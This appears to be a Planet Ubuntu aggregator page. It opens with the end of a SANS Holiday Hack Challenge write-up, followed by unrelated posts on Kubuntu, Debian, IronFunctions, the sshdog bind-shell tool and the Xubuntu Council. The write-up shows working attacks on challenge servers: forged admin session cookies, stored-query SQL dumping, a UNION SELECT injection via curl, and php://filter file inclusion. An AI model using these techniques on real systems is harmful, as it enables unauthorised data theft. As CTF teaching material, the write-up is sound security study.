Looking at the source, we find a few interesting files (given that we know an audio file is at least one of our goals): there’s a getaudio.php that returns a download of an mp3 file from the database (storing the whole MP3 in a database column isn’t the design choice I would have made, but I suppose I’ll be discovering a lot of design choices I wouldn’t have made). It’s noteworthy that the only user it will allow to download a file is the user guest. I decided to try logging in with the credentials we found in the app earlier (guest:busyreindeer78), and was straight in. Conveniently, the top of the page has a link labeled “MP3”, and a click later we have discombobulatedaudio2.mp3.

That was easy, but I have reason to believe we’re not done here – if for no reason other than the fact that there are 2 references to the analytics server in the challenge description. There’s also quite a bit of functionality we haven’t tried out yet. I spent a few minutes reviewing the SQL queries in the application. They’re not parameterized queries (again, differing design decisions) but the liberal use of mysqli_real_escape_string seems to prevent any obvious SQL injection.

One notable feature is the ability to save analytics reports. It’s *particularly *notable that the way in which they are saved is by storing the final SQL query into a column in the reports table. There’s also an ‘edit’ function for these saved queries, which seems to be design just for renaming the saved reports, but if we look at the code, we easily see that we can edit any column stored in the database, including the stored SQL query. I’m honestly not sure what the right term is for this vulnerability (SQL injection implies injecting into an existing query, after all), but it’s clearly a vulnerability that will let us read arbitrary data from the database – including the stored MP3s, assuming we can access the edit functionality.

Code allowing any column to be updated:

1 2 3 4 5 6 7 8 9 10$row = mysqli_fetch_assoc($result); # Update the row with the new values $set = []; foreach($row as $name => $value) { print "Checking for " . htmlentities($name) . "...<br>"; if(isset($_GET[$name])) { print 'Yup!<br>'; $set[] = "$name='".mysqli_real_escape_string($db, $_GET[$name])."'"; } }

This edit function is allegedly restricted to not allow any users access:

(edit.php)

1 2# Don't allow anybody to access this page (yet!) restrict_page_to_users($db, []);

However, if we investigate the restrict_page_to_users function, we find that it calls check_access from db.php, which contains this code:

(db.php)

1 2 3 4 5function check_access($db, $username, $users) { # Allow administrator to access any page if($username == 'administrator') { return; }

We now know that there’s probably an “administrator” user and that getting to that will allow us to access the edit.php page. Unfortunately, we don’t have credentials to log in as administrator, and we can’t use our arbitrary SQL to read the credentials until we have access. Stuck in a Catch-22? Not quite: who said we have to log in?

Earlier I foreshadowed the value of having access to the git repository for the site: session cookies are encrypted with symmetric crypto, and the key is available in the git repository:

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

This allows us to encrypt our own session cookie as administrator. I hacked together a short script to create a new AUTH cookie:

1 2 3 4 5 6<?PHP include('crypto.php'); print encrypt(json_encode([ 'username' => 'administrator', 'date' => date(DateTime::ISO8601), ]));

Using my favorite cookie-editing extension to update my cookie, I quickly discover that the edit functionality is now available. Now, the edit page doesn’t provide an input field for the query, but thanks to Burp Suite, it’s easy enough to add my own parameter and edit the query. Based on getaudio.mp3, I know the schema for the audio table, so I craft a query to get it. Lacking an easy way to return the binary data directly (I can only execute this query within the context of an HTML page) I decide to return the MP3 encoded as a string. Base64 would probably be ideal to minimize overhead, but the TO_BASE64 function was added in 5.6 and I was too lazy to query the version from the database, so I encoded as hex instead.

I wanted the following query: SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio, so I POST’d to the following URL:

https://analytics.northpolewonderland.com/edit.php?id=1147b606-4d2f-4faa-b771-a55e03307367&name=foo&description=bar&query=SELECT+`id`,`username`,`filename`,hex(`mp3`)+FROM+audio

Then I ran the report with the saved report functionality, and extracted the hex and decoded it to reveal the other MP3 file. Based on the filename stored in the report, I saved it to my audio directory with the name discombobulatedaudio7.mp3. From the query results, we know these are the only 2 MP3s in the audio table, so it seems like it’s time to move on to the next server, but I decided to grab the passwords from the users table by updating the query again, just in case they might be useful later:

Addendum: An Unintentional Vulnerability

After finishing all of the challenges, I happened to be looking back at this one when I discovered a 2nd vulnerability, which I suspect was not intended as part of the challenge. If you notice the file query.php does a number of input validation checks, each looking something like this:

1 2 3 4if(!ctype_alpha($field)) { reply(400, "Field name can only contain letters!"); die(); }

You’ll notice the reply function sets the HTTP status code and prints a message, then the script dies to prevent further execution. However, if you look further down (line 178), you’ll discover this check and query construction:

1 2 3 4 5 6 7 8 9$type = $_REQUEST['type']; if($type !== 'launch' && $type !== 'usage') { reply(400, "Type has to be either 'launch' or 'usage'!"); } $query = "SELECT * "; $query .= "FROM `app_" . $type . "_reports` "; $query .= "WHERE " . join(' AND ', $where) . " "; $query .= "LIMIT 0, 100";

Though it appears the author intended to limit type to the strings ‘launch’ and ‘usage’, the lack of a call to die() in the error handler results in the query being executed and results returned anyway! So we can inject into the type field and steal the mp3 files using a UNION SELECT SQL injection:

1curl 'https://analytics.northpolewonderland.com/query.php' -H 'Cookie: AUTH=82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d87e572ba65ce9b6548b3494b6063a30265b71c76884152' -H 'Content-Type: application/x-www-form-urlencoded' --data 'date=2017-01-05&type=usage_reports` LIMIT 0 UNION SELECT id,username,filename,to_base64(mp3),NULL from audio -- ' ads.northpolewonderland.com

The nmap results for this host were rather unremarkable: essentially, yes, it’s a webserver. Visiting the full URL from the APK, the site returns directly an image file (no link? I guess these banner ads are for brick-and-mortar stores), so navigating to the root, we find the administration site for the ad system.

Fortunately, I had happened upon a helpful elf who informed me about this “Meteor” javascript framework, and the MeteorMiner script for extracting information from Meteor. Unfortunately, I had never seen Meteor before, so I had no idea what was going on. After trying some braindead attempts to steal the credentials for an administrator (Meteor.users.find().fetch() returned nothing), I attempted to register a new account to see if I could get access to more interesting functionality that way, but was repeatedly rebuffed by the site:

I began to look into how Meteor manages users, and guessed that they were using the default user management package. According to the documentation, you could add users for testing by calling the createUser method:

Accounts.createUser({password:'matirwuzhere', username:'matir'})

It turns out that this worked to create a user, and even directly logged me in as that user. Unfortunately, all of the pages still gave me a response of “You must be logged in to access this page”. I clicked around and generated dozens of requests and didn’t realize anything had meaningfully changed until I noticed that MeteorMiner was reporting a 5th member of the HomeQuote collection. Examining the collection in the javascript console revealed my prize: the path to an audio file, discombobulatedaudio5.mp3:

dev.northpolewonderland.com

Nmap gets us nothing here: just HTTP and SSH open. Visiting the webserver, we find nothing, literally. Just a “200 OK” response with no content. I can’t dirbuster (thanks Tom!), so how can I figure out what the web application might be doing?

Well, I have essentially two options: I can analyze the SantaGram APK, maybe use dex2jar and JAD (or another Java decompiler) to have semi-readable source, or maybe I can run the APK in an emulator and capture requests with Burp Suite. For several reasons, I decide to go with the 2nd route, not the least of which is that I spend a lot of time in Burp during my day-to-day, so I’ll be using the tools I’m more familiar with.

So I fire up the Android emulator with the proxy set to my Burp instance, install SantaGram with adb, and start playing with the app. It turns out this is another place that we can use the guest:busyreindeer78 credentials to log in, but no matter what I do in the app, I can’t seem to see any requests for dev.northpolewonderland.com. Looking at res/values/strings.xml from the APK, I see an important entry adjacent to the dev.northpolewonderland.com entry:

1 2 3<string name="debug_data_collection_url"> http://dev.northpolewonderland.com/index.php</string> <string name="debug_data_enabled">false</string>

Well, I suppose it’s not sending requests to dev because debug_data_enabled is false. Let’s change that to true and rebuild the APK:

1 2 3 4 5% apktool b -o santagram_mod.apk santagram % /tmp/apk-resigner/signapk.sh ./santagram_mod.apk % adb install santagram_mod.apk % adb uninstall com.northpolewonderland.santagram % adb install signed_santagram_mod.apk

It turns out rebuilding the APK was more troublesome than I anticipated because it needed to be resigned, and then the resigned one couldn’t be installed because it used a different key than the existing one, so I needed to uninstall the HHC SantaGram and install mine. (Clearly I need to do more mobile assessments.)

With the debug-enabled version installed, it was time to play with the app some more. While debugging the lack of debug requests, I noticed several references to the debug code in the user profile editing class, so I decided to give that a try and noticed (finally!) requests to dev.northpolewonderland.com.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15POST /index.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: dev.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 144 {"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400} HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Fri, 30 Dec 2016 20:09:37 GMT Content-Type: application/json Connection: close Content-Length: 250 {"date":"20161230200937","status":"OK","filename":"debug-20161230200937-0.txt","request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":false}}

I noticed that the entire request is included in the response, plus a new field is added to the JSON: "verbose":false. Can we include that in the request, and maybe switch it to true? I send the request to Burp Repeater and add the verbose field, set to true:

1 2 3 4 5 6 7 8POST /index.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: dev.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 159 {"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true}

Unsurprisingly, the response changes, but we get way more than more details about our own debug message!

1 2 3 4 5 6 7HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Fri, 30 Dec 2016 23:01:56 GMT Content-Type: application/json Connection: close Content-Length: 465 {"date":"20161230230156","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161230230156-0.txt","filename.len":26,"request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true},"files":["debug-20161224235959-0.mp3","debug-20161230224818-0.txt","debug-20161230225810-0.txt","debug-20161230230155-0.txt","debug-20161230230156-0.txt","index.php"]}

You’ll notice we got a listing of all the files in the current directory (they must be cleaning that up periodically!), including an mp3 file. Could this be the next discombobulatedaudioN.mp3? I download the file and get something of approximately the right size, but it’s not clear which of the discombobulated files it will be. All of the others had a filename in the discombobulated format (at least nearby, if not directly) so I set this one aside to be renamed later.

dungeon.northpolewonderland.com

Initial nmap results for dungeon.northpolewonderland.com weren’t revealing anything too interesting. Visting the webserver, I found what appears to be the help documentation for a Zork-style dungeon game. I remembered one of the elves offering up a copy of a game from a long time ago, so I went back and downloaded it.

I started playing the game briefly but, for as much as I love RPGs (I used to run several MUDs back in the 90s), I was impatient and wanted to get on with the Holiday Hack Challenge. I started with the obvious: running strings both on the binary and the data file, but that gave very little headway. I looked at Zork data file editors, but the first couple I found couldn’t decompile the provided data file (whether this is by accident, by design of the challenge, or because I picked the wrong tools, I have no idea), but that proved not to be useful. However, on one of the sites where I was reading about reversing Zork games, I discovered a mention of a built-in debugger called GDT, or the Game Debugger Tool. Among other things, GDT lets you dump all the information about NPCs, strings in the game, etc. Much like I would use GNU strings to get oriented to an unknown binary, I decided to use the GDT strings dump to find all of the in-game strings. Unfortunately, GDT required that I give it a string index and dump one at a time. Not knowing how many strings there were, I picked 2048 for a starting point and did a little inline shell script to dump them. I discovered that it starts to crash after about 1279, and the last handful seemed to be garbage (ok, no bounds checking, I wonder what else I could do?), so I decided to adjust my 2048 to 1200 and try again:

1 2 3 4 5 6 7for i in seq 1 1200; do echo -n "$i: " echo -e "GDT\nDT\n$i\nEX\nquit\ny" | \ ./dungeon 2>/dev/null | \ tail -n +5 | \ head -n -3 done

This produced a surprisingly readable strings table, except for some garbage at the end. (It appears the correct number of strings is 1027 for this particular game file.) At a quick glance, I notice some references to an “elf” near the end, while the rest of the seemed like pretty standard Zork gameplay. Most interesting seemed to be this line:

1 21024: >GDT>Entry: The elf, satisified with the trade says - Try the online version for the true prize

Well great, I need to find an online version, but I didn’t find a clue as to where it would be from the webpage with instructions, nor did the rest of the strings in the offline version offer a hint. When in doubt – more recon! Time for a full NMAP scan (but I’ll leave scripts off in the interest of time):

1 2 3 4 5 6 7 8 9 10Starting Nmap 7.31 ( https://nmap.org ) Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139) Host is up (0.066s latency). rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com Not shown: 64989 closed ports, 543 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 11111/tcp open vce Nmap done: 1 IP address (1 host up) scanned in 46.16 seconds

Aha! Port 11111 is open. I imagine netcat will give us an instance of the dungeon game. My first question is whether the “Try the online version for the true prize” string says something different:

1 2 3 4 5 6 7 8 9 10% nc dungeon.northpolewonderland.com 11111 Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >GDT GDT>DT Entry: 1024 The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek.

That was surprisingly easy – I really expected to need to do more. Maybe it’s misleading? I send an email off to Peppermint and wait with anticipation for Santa’s elves to do their work.

It turns out it really was that easy! Moments later, I have an email from Pepperment with an attachment: it’s discombobulatedaudio3.mp3!

ex.northpolewonderland.com

One last server to go! This server is apparently for handling uncaught exceptions from the application. To figure out what kind of traffic it’s seeing, I decided to try to trigger an exception in the application running in the emulator (still going from my work on dev.northpolewonderland.com). I actually stumbled upon this by mistake: if you change the device to be emulated to a Nexus 6, the application crashes and sends a crash report to ex.northpolewonderland.com.

1 2 3 4 5 6 7 8POST /exception.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: ex.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 3860 {"operation":"WriteCrashDump","data":{...}}

I’ve omitted the contents of “data” in the interest of space, but it mostly contained the traceback of the exception that was thrown. Interestingly, the response indicates that crashdumps are stored with a PHP extension, so my first thought was to try to include PHP code in the backtrace, but that never worked out (the code wasn’t being executed). I’m assuming the PHP interpreter wasn’t turned on for that directory.

1 2 3 4 5 6 7 8 9 10HTTP/1.1 200 OK Server: nginx/1.10.2 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 81 { "success" : true, "folder" : "docs", "crashdump" : "crashdump-QKMuKk.php" }

It turns out there’s also a ReadCrashDump operation that you can provide a crashdump name and it will return the contents. You omit the php extension when sending the request, like so:

1 2 3 4 5 6 7 8POST /exception.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: ex.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 69 {"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QKMuKk"}}

Given that I confirmed the crashdumps are in a folder “docs” relative to exception.php, I tried reading the “crashdump” ../exception to see if I could view the source, but that gives a 500 Internal Server Error. (Likely it keeps loading itself in an include() loop.) PHP, however, provides some creative ways to read data, filtering it inline. These pseudo-URLs for file opening result in different encodings and can be quite useful for bypassing LFI filters, non-printable characters for extracting binaries, etc. I chose to use one that encodes a file as base64 to see if I could get the source of exception.php:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17POST /exception.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: ex.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 109 {"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=../exception"}} HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Sat, 31 Dec 2016 00:56:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 3168 PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDog … oZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K

The base64 encoded output is a great sign. I decode it to discover, as expected, the contents of exception.php, which starts with this helpful hint:

1 2<?php # Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

So, there we have our final piece of the discombobulated audio: discombobulatedaudio6.mp3. This particular LFI was interesting for a few reasons: the use of chdir() to change directory instead of prepending the directory name, and the requirement that the file ends in .php. Had they prepended the directory name, a filter could not have been used because the filter must be at the beginning of the string passed to the PHP file open functions (like require, include, fopen).

Part 5: Discombobulated Audio Fixing the Audio

We now have 7 audio files. Listening to each one, you don’t hear much, but the overall tone suggests to me that the final file has been slowed somewhat. So I open up Audacity and put all the files into one project. Then I used the option “Tracks > Align Tracks > Align End to End” to place the tracks into a series, with the resulting audio concatenated like this:

I wasn’t sure if numerical order would be the right order, but the amplitude of the end of each piece looked similar to the amplitude of the beginning of the next piece and playing the audio sounded rather continuous, but still unintelligible, so I decided to proceed. (I was hoping nobody was going to make me try all 5040 permutations of audio!) I merged the tracks together (via Tracks > Mix and Render) and then changed the tempo (via Effects > Change Tempo) by about 600%. It still didn’t sound quite right, but was close enough that I could make out the message:

“Merry Christmas, Santa Claus, or as I have always known him, Jeff”

It wasn’t clear to me what to do with the audio, or how this would help to find the kidnapper, but since there’s still one door that I didn’t have the password to (the corridor behind Santa’s office), I decided to try and see if this helped with getting past the door.

Santa’s Kidnapper

I was honestly a little surprised when the “Nice” light flashed and I was past the last locked door! As soon as I was through, I was in a small dark room with a ladder going up. I actually hesitated to click up the ladder, because part of me didn’t want the game to be over. But without anything else to do in the game (except collect NetWars coins… that took a little extra time) I clicked up the ladder, expecting a nefarious villain, and finding…. Dr. Who?

But why, Dr. Who, why? I can’t, for the life of me, imagine a reason to kidnap Santa Claus and take him back to 1978.

As told in his own words:

<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.

Well, actually, I think I have to agree with the Doctor. The world would be a much better place without the Star Wars Holiday Special, but the ends do not justify the means, however Santa was returned in time to complete his Christmas rounds and deliver the toys via portal to all the white hat boys and girls of the world. (And perhaps a few of the grey hats too…)

Kubuntu General News: Plasma 5.8.5 bugfix release in Xenial and Yakkety Backports now

Planet Ubuntu - Thu, 01/05/2017 - 00:57

Plasma 5.8.5 brings bug-fixes and translations from the month of December, thanks to the hard work of the Plasma team and the KDE Translation team.

To update, use the Software Repository Guide to add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

Instructions on how to manage PPAs and more info about the Kubuntu PPAs can be found in the Repositories Documentation

Seif Lotfy: Hot Functions for IronFunctions

Planet Ubuntu - Wed, 01/04/2017 - 13:50

For every request, IronFunctions would spin up a new container to handle the job, which depending on container and task could add a couple of 100ms of overhead.

So why not reuse the containers if possible? Well that is exactly what Hot Functions do.

Hot Functions improve IronFunctions throughput by 8x (depending on duration of task).

Hot Functions reside in long-lived containers addressing the same type of task, which take incoming workload and feed into their standard input and read from their standard output. In addition, permanent network connections are reused.

Here is how a hot function looks like. Currently, IronFunctions implements a HTTP-like protocol to operate hot containers, but instead of communication through a TCP/IP port, it uses standard input/output.

So to test this baby we deployed on 1 GB Digital Ocean instances (which is not much), and used Honeycomb to track and plot the performance.

Simple function printing "Hello World" called for 10s (MAX CONCURRENCY = 1).

Hot Functions have 162x higher throughput.

Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 1).
Hot Functions have 1,39x higher throughput.

By combining Hot Functions with concurrency we saw even better results:

Complex function pulling image and md5 checksumming called for 10s (MAX CONCURRENCY = 7)

Hot Functions have 7,84x higher throughput.

So there you have it, pure awesomeness by the Iron.io team in the making.

Also a big thank you to the good people from Honeycomb for their awesome product that allowed us to benchmark and plot (All the screenshots in this article are from Honeycomb). Its a great and fast new tool for debugging complex systems by combining the speed and simplicity of time series metrics with the raw accuracy and context of log aggregators.

Since it supports answering arbitrary, ad-hoc questions about those systems in real time, it was an awesome, flexible, powerful way for us to test IronFunctions!

Raphaël Hertzog: My Free Software Activities in December 2016

Planet Ubuntu - Wed, 01/04/2017 - 02:48

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donors (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

Debian LTS

I was allocated 10 hours to work on security updates for Debian 7 Wheezy. During this time I did the following:

  • I released DLA-741-1 on unzip. This was an easy update.
  • I reviewed Roberto Sanchez’s patch for CVE-2014-9911 in ICU.
  • I released DLA-759-1 on nss in collaboration with Antoine Beaupré. I merged and updated Guido’s work to enable the testsuite during build and to add DEP-8 tests.
  • I created a git repository for php5 maintenance in Debian LTS and started to work on an update. I added patches for two CVE (CVE-2016-3141, CVE-2016-2554) and added some binary files required by (currently failing) tests.
Misc packaging

With the strong freeze approaching, I had some customer requests to push packages into Debian and/or to fix packages that were in danger of being removed from stretch.

While trying to bring back uwsgi into testing I filed #847095 (libmongoclient-dev: Should not conflict with transitional mongodb-dev) and #847207 (uwsgi: FTBFS on multiple architectures with undefined references to uwsgi_* symbols) and interacted on some of the RC bugs that were keeping the package out of testing.

I also worked on a few new packages (lua-trink-cjson, lua-inotify, lua-sandbox-extensions) that enhance hindsight in some use cases and sponsored a rozofs update in experimental to fix a file conflict with inn2 (#846571).

Misc Debian work

Debian Live. I released two live-build updates. The second update added more options to customize the grub configuration (we use it in Kali to override the theme and add more menu entries) both for EFI boot and normal boot.

Misc bugreports. #846569 on libsnmp-dev to accomodate the libssl transition (I noticed the package was not maintained, I asked for new maintainers on debian-devel). #847168 on devscripts for debuild that started failing when lintian was failing (unexpected regression). #847318 on lintian to not emit spurious errors for kali packages (which was annoying with the debuild regression above). #847436 for an upgrade problem I got with tryton-server. #847223 on firefoxdriver as it was still depending on iceweasel instead of firefox.

Sponsorship. I sponsored a new version of asciidoc (#831965) and of ssldump 0.9b3-6 (for libssl transition). I also uploaded a new version of mutter to fix #846898 (it was ready in SVN already).

Distro Tracker

Not much happening, I fixed #814315 by switching a few remaining URLs to https. I merged patches from efkin to fix the functional test suite (#814315), that was a really useful contribution! The same contributer started to tackle another ticket (#824912) about adding an API to retrieve action items. This is a larger project and needs some thoughts. I still have to respond to him on his latest patches (after two rounds already).

Misc stuff

I updated the letsencrypt-sh salt formula for version 0.3.0 and added the possibility to customize the hook script to reload the webserver.

The @planetdebian twitter account is no longer working since twitterfeed.com closed doors and the replacement (dlvr.it) is unhappy about the RSS feed of planet.debian.org. I filed bug #848123 against planet-venus since it does not preserve the isPermalink attribute in the guid tag

Thanks

See you next month for a new summary of my activities.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

David Tomaschik: New Tool: sshdog

Planet Ubuntu - Wed, 01/04/2017 - 01:00

I recently needed an encrypted, authenticated remote bind shell due to a situation where, believe it or not, the egress policies were stricter than ingress! Ideally I could forward traffic and copy files over the link.
I was looking for a good tool and casually asked my coworkers if they had any ideas when one said “sounds like SSH.”

Well, shit. That does sound like SSH and I didn’t even realize it. (Tunnel vision, and the value of bouncing ideas off of others.) But I had a few more requirements in total:

  • Encrypted
  • Authenticated
  • Bind (not reverse)
  • Windows & Linux
  • No Admin/Installation required
  • Can be shipped preconfigured
  • No special runtime requirements

At this point, I began hunting for SSH servers that fit the bill, but found none. So I began to think about Paramiko, the SSH library for Python, but then I’d still need the Python runtime (though there are ways to build a binary out of a python script). I then recalled once seeing that Go has an ssh package. I looked at it, hoping it would be as straightforward as Paramiko (which can become a full SSH server or client in about 10 lines), but it’s not quite so. With the Go package, all of the crypto is handled for you, but you need to handle the incoming channels and requests yourself. Fortunately, the package provides code for marshaling and unmarshaling messages from the SSH wire format.

I decided that I would get a better performance and more predictable behavior without needing to package the Python runtime, plus I appreciated the stability Go would provide (fewer runtime errors), so I began developing. What I ended up with is sshdog, and I’m releasing it today.

sshdog supports:

  • Windows & Linux
  • Configure port, host key, authorized keys
  • Pubkey authentication (no passwords)
  • Port forwarding
  • SCP (but no SFTP support)

Additionally, it’s capable of being installed as a service on Windows, and daemonizing on Linux. It uses go.rice to embed configuration within the resulting binary and give you a single executable that runs the server.

Example Usage

1 2 3 4 5 6 7 8 9 10 11% go build . % ssh-keygen -t rsa -b 2048 -N '' -f config/ssh_host_rsa_key % echo 2222 > config/port % cp ~/.ssh/id_rsa.pub config/authorized_keys % rice append --exec sshdog % ./sshdog [DEBUG] Adding hostkey file: ssh_host_rsa_key [DEBUG] Adding authorized_keys. [DEBUG] Listening on :2222 [DEBUG] Waiting for shutdown. [DEBUG] select...

Why sshdog?

The name is supposed to be a riff off netcat and similar tools, as well as an anagram for “Go SSHD”.

Please, give it a try and feel free to file bugs/pull requests on the Github project. https://github.com/Matir/sshdog.

Dustin Kirkland: My 2017 New Years Resolution...

Planet Ubuntu - Tue, 01/03/2017 - 15:36

What's yours?

Happy 2017!
:-Dustin

Ubuntu Weekly Newsletter Issue 493

The Fridge - Tue, 01/03/2017 - 09:20

Welcome to the Ubuntu Weekly Newsletter. This is issue #493 for the weeks of December 19, 2016 – January 1, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

Bryan Quigley: Do you have any old file format images?

Planet Ubuntu - Tue, 01/03/2017 - 07:47

I’m specifically looking for:
OS/2 Metafile (.met)
PICT (Mac’s precursor to PDF) https://en.wikipedia.org/wiki/PICT

Also useful might be:
PCD – Kodak Photo CD
RAS – Sun Raster Image

I’m trying to evaluate if LibreOffice should keep support for them (specifically if the support is good). Unfortunately I can only generate the images using LibreOffice (or sister projects) which doesn’t really provide a great test.

Please either:
* Provide a link in a comment below
* Email me B @ (If emailed, please mention if I can share the image publicly)

If I find the support works great I’d try to integrate a few of them into LO tests so we make sure they don’t regress.

Thank you!  [Update, files are now part of LibreOffice’s test server]

 

Ross Gammon: Happy New Year – My Free Software activities in December 2016

Planet Ubuntu - Mon, 01/02/2017 - 15:58

So that was 2016! Here’s a summary of what I got up to on my computer(s) in December, a check of how I went against my plan, and the TODO list for the next month or so.

With a short holiday to Oslo, Christmas holidays, Christmas parties (at work and with Alexander at school, football etc.), travelling to Brussels with work, birthdays (Alexander & Antje), I missed a lot of deadlines, and failed to reach most of my Free Software goals (including my goals for new & updated packages in Debian Stretch – the soft freeze is in a couple of days). To top it all off, I lost my grandmother at the ripe old age of 93. Rest in peace Nana. I wish I could have made it to the funeral, but it is sometimes tough living on the other side of the world to your family.

Debian Ubuntu
  • Added the Ubuntu Studio testsuites to the package tracker, and blogged about running the Manual Tests.
Other Plan status & update for next month Debian

Before the 5th January 2017 Debian Stretch soft freeze I hope to:

For the Debian Stretch release:

Ubuntu
  • Add the Ubuntu Studio Manual Testsuite to the package tracker, and try to encourage some testing of the newest versions of our priority packages. – Done
  • Finish the ubuntustudio-lightdm-theme, ubuntustudio-default-settings transition including an update to the ubuntustudio-meta packages. – Still to do
  • Reapply to become a Contributing Developer. – Still to do
  • Start working on an Ubuntu Studio package tracker website so that we can keep an eye on the status of the packages we are interested in. – Still to do
  • Start testing & bug triaging Ubuntu Studio packages.
  • Test Len’s work on ubuntustudio-controls
Other
  • Continue working to convert my Family History website to Jekyll – Done
  • Try and resurrect my old Gammon one-name study Drupal website from a backup and push it to the new GoONS Website project.
  • Give JMRI a good try out and look at what it would take to package it.

Dimitri John Ledkov: Ubuntu Archive and CD/USB images complete migration to 4096 RSA signing keys

Planet Ubuntu - Mon, 01/02/2017 - 06:54

Enigma machine photo by Alessandro Nassiri [CC BY-SA 4.0], via Wikimedia Commons
Ubuntu Archive and CD/USB image use OpenPGP cryptography for verification and integrity protection. In 2012, a new archive signing key was created and we have started to dual-sign everything with both old and new keys.

In April 2017, Ubuntu 12.04 LTS (Precise Pangolin) will go end of life. Precise was the last release that was signed with just the old signing key. Thus when Zesty Zapus is released as Ubuntu 17.04, there will no longer be any supported Ubuntu release that require the 2004 signing keys for validation.

The Zesty Zapus release is now signed with just the 2012 signing key, which is 4096 RSA based key. The old 2004 signing keys, where were 1024 DSA based, have been removed from the default keyring and are no longer trusted by default in Zesty and up. The old keys are available in the removed keys keyring in the ubuntu-keyring package, for example in case one wants to verify things from old-releases.ubuntu.com.

Thus the signing key transition is coming to an end. Looking forward, I hope that by 18.04 LTS time-frame the SHA-3 algorithm will make its way into the OpenPGP spec and that we will possibly start a transition to 8096 RSA keys. But this is just wishful thinking as the current key strength, algorithm, and hashsums are deemed to be sufficient.

Xubuntu: Introducing the Xubuntu Council

Planet Ubuntu - Sun, 01/01/2017 - 09:43

At the beginning of 2016 the Xubuntu team started a process to transition the project to become council-run rather than having a single project leader. After careful planning, writing and approving the general direction, the team was ready to vote on for the first three members of the council for the project.

In this article we explain what the new Xubuntu Council is and who the council members are.

What is the Xubuntu Council about?

The purpose of the council is very similar to the purpose of the former Xubuntu Project Leader (XPL): to make sure the direction of the project stays stable, in adherence to the Strategy Document and be responsible for making long-term plans and decisions where needed.

The two main differences between a council and the XPL, both favoring the council approach, are:

  • The administrative and bureaucratic work of managing the project is split between several people. This means more reliability and faster response times.
  • A council, with a diversity of views, can more fairly evaluate and arbitrate disputes.

Additionally, the council will stay more in the background in terms of daily decisions, the council does not have a casting or veto vote in the same way that the XPL had. We believe this lets us embrace the expertise in the team even more than we did before. The council also acts as a fallback to avoid deadlocks that a single point of failure like “an XPL gone missing” could produce.

If you wish to learn more about the council, you can read about it in the Xubuntu Council section of our contributor documentation.

Who is in the Council?

On August 31st, Simon Steinbeiß announced the results of vote by Xubuntu project members. The first Xubuntu Council contains the following members:

  • Sean Davis (bluesabre), the council chair and the Xubuntu Technical Lead
  • Simon Steinbeiß (ochosi), the Xubuntu Artwork Lead and a former XPL
  • Pasi Lallinaho (knome), the Xubuntu Website Lead and a former XPL and former Xubuntu Marketing Lead

